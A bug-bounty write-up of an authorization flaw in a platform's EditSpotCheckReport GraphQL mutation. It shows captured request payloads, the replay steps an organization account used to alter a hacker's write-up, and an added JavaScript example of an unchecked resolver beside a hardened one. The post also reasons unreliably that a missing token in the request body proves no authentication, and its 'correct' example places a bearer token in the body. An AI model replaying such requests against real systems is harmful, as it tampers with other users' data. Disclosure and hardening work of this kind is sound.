Discovering a vulnerability in HackerOne


Loaymorad

A hacker discovered that organization team members or HackerOne staff can modify a user's Spot Check write-up.


First:

There is no user interface option or button that allows any organization team member or HackerOne staff to edit the hacker's (user's) write-up.

So how is it done?

The hacker (user) submits a write-up, then edits it and intercepts the resulting GraphQL request, which looks like this:

{
  "operationName": "EditSpotCheckReport",
  "variables": {
    "input": {
      "spot_check_report_id": "Z2lkOi8vaGFja2Vyb25lL1Nwb3RDaGVja1JlcG9ydC81MDU=",
      "executive_summary": "x",
      "scope": "x",
      "methodology_and_tooling": "X",
      "findings_and_evidence": "none",
      "time_spent": 0,
      "files": [],
      "removed_attachment_ids": [],
      "report_ids": []
    },
    "product_area": "hacker_dashboard",
    "product_feature": "redirect_overview"
  },
  "query": "mutation EditSpotCheckReport($input: EditSpotCheckReportInput!) {\n editSpotCheckReport(input: $input) {\n spot_check_report {\n id\n _id\n state\n __typename\n }\n was_successful\n errors {\n edges {\n node {\n id\n type\n field\n message\n __typename\n }\n __typename\n }\n __typename\n }\n __typename\n }\n}\n"
}

If you look closely at that request, there is one critical detail that makes the hacker suspect a bug: there is no user authentication. There is no authToken to confirm that the request comes from an authenticated user. For comparison, it should look something like this:

{
  "operationName": "EditSpotCheckReport",
  "variables": {
    "input": {
      "spot_check_report_id": "Z2lkOi8vaGFja2Vyb25lL1Nwb3RDaGVja1JlcG9ydC81MDU=",
      "executive_summary": "Updated Summary",
      "scope": "Updated Scope",
      "methodology_and_tooling": "Updated Methodology",
      "findings_and_evidence": "Updated Evidence",
      "time_spent": 5,
      "files": [],
      "removed_attachment_ids": [],
      "report_ids": []
    }
  },
  "query": "mutation EditSpotCheckReport($input: EditSpotCheckReportInput!) {\n editSpotCheckReport(input: $input) {\n spot_check_report {\n id\n _id\n state\n __typename\n }\n was_successful\n errors {\n edges {\n node {\n id\n type\n field\n message\n __typename\n }\n __typename\n }\n __typename\n }\n __typename\n }\n}\n",
  "authToken": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
}

Because the real (captured) request has no proper authentication and authorization checks, and there is no detailed audit logging, the hacker logged into the organization account and sent the modified GraphQL request. The result: the user's write-up changed. What did he modify? The executive_summary, scope, methodology_and_tooling, and findings_and_evidence fields, which he could set to any other value.
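The fix for this class of bug is an object-level authorization check in the mutation's resolver, plus an audit trail of every attempt. The following is an added example, not HackerOne's code: a small in-memory resolver for EditSpotCheckReport that shows the unchecked behaviour the article describes next to a hardened version. The store, the account ids (hacker 42, organization member 7), the function names and the audit-log format are all constructed for illustration; only the report id and the input fields come from the captured request above.

```javascript
// Added example, not HackerOne's code: a resolver for the EditSpotCheckReport
// mutation with the checks the article says were missing (authentication,
// object-level authorization, audit logging). The in-memory store, the
// function names and the sample accounts are constructed for illustration.

const EDITABLE_FIELDS = ['executive_summary', 'scope',
  'methodology_and_tooling', 'findings_and_evidence', 'time_spent'];

let reports;   // numeric report id -> record
let auditLog;  // one entry per edit attempt, allowed or denied

// Constructed data: report 505 belongs to hacker account 42.
function resetStore() {
  reports = new Map([[505, { author_id: 42, state: 'draft', executive_summary: 'x',
    scope: 'x', methodology_and_tooling: 'X', findings_and_evidence: 'none', time_spent: 0 }]]);
  auditLog = [];
}
resetStore();

// The id in the captured request is base64 of gid://hackerone/SpotCheckReport/505
function decodeGid(gid) {
  const text = Buffer.from(gid, 'base64').toString('utf8');
  const m = /^gid:\/\/hackerone\/(\w+)\/(\d+)$/.exec(text);
  if (!m) throw new Error('malformed global id');
  return { type: m[1], id: Number(m[2]) };
}

// Response shapes mirror the fields the mutation in the article selects.
function errorResponse(type, field, message) {
  return { spot_check_report: null, was_successful: false,
    errors: { edges: [{ node: { type, field, message } }] } };
}

function okResponse(gid, id, report) {
  return { spot_check_report: { id: gid, _id: id, state: report.state },
    was_successful: true, errors: { edges: [] } };
}

function applyEdit(report, input) {
  for (const f of EDITABLE_FIELDS) if (f in input) report[f] = input[f];
}

// The behaviour described in the article: whoever sends a valid report id gets
// to edit that report. Kept only as the "before" of the fix.
function editSpotCheckReportUnchecked(ctx, input) {
  const { id } = decodeGid(input.spot_check_report_id);
  const report = reports.get(id);
  if (!report) return errorResponse('not_found', 'spot_check_report_id', 'no such report');
  applyEdit(report, input);
  return okResponse(input.spot_check_report_id, id, report);
}

// Hardened resolver: require a session, then require ownership of the object,
// and record both outcomes so an abuse attempt leaves a trace.
function editSpotCheckReport(ctx, input) {
  if (!ctx.user) {
    auditLog.push({ actor: null, action: 'EditSpotCheckReport', outcome: 'denied_unauthenticated' });
    return errorResponse('unauthenticated', null, 'login required');
  }
  const { type, id } = decodeGid(input.spot_check_report_id);
  const report = type === 'SpotCheckReport' ? reports.get(id) : undefined;
  // Same answer for "does not exist" and "not yours", so ids cannot be probed.
  if (!report || report.author_id !== ctx.user.id) {
    auditLog.push({ actor: ctx.user.id, action: 'EditSpotCheckReport',
      report_id: id, outcome: 'denied_unauthorized' });
    return errorResponse('not_found', 'spot_check_report_id', 'no such report');
  }
  applyEdit(report, input);
  auditLog.push({ actor: ctx.user.id, action: 'EditSpotCheckReport', report_id: id,
    outcome: 'allowed', fields: EDITABLE_FIELDS.filter(f => f in input) });
  return okResponse(input.spot_check_report_id, id, report);
}

// The "input" object from the article's second request, used as sample input.
const sampleInput = {
  spot_check_report_id: 'Z2lkOi8vaGFja2Vyb25lL1Nwb3RDaGVja1JlcG9ydC81MDU=',
  executive_summary: 'Updated Summary', scope: 'Updated Scope',
  methodology_and_tooling: 'Updated Methodology', findings_and_evidence: 'Updated Evidence',
  time_spent: 5, files: [], removed_attachment_ids: [], report_ids: [],
};

// Constructed sessions: the report's author and an organization member.
const hackerCtx = { user: { id: 42, role: 'hacker' } };
const orgCtx = { user: { id: 7, role: 'organization_member' } };

// Stand-alone run: the organization member is refused, the author is allowed.
console.log(JSON.stringify(editSpotCheckReport(orgCtx, sampleInput)));
console.log(JSON.stringify(editSpotCheckReport(hackerCtx, sampleInput)));
console.log(auditLog);
```

The check is on the object (who owns report 505), not on the caller's role: an organization member is a perfectly valid authenticated user, which is why a "logged in?" check alone would not have stopped this. Returning not_found for both missing and foreign ids keeps the mutation from confirming which ids exist, and the audit entries are what a detection rule would key on (denied_unauthorized on EditSpotCheckReport from an organization session).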

There is one more step: verify the change by logging in with the user account and confirming that the write-up has changed.

Lastly, if you are wondering what the organization account is: it is the account for companies that host a bug bounty program on HackerOne.

Stay tuned for the next attacks, and don't forget to subscribe.
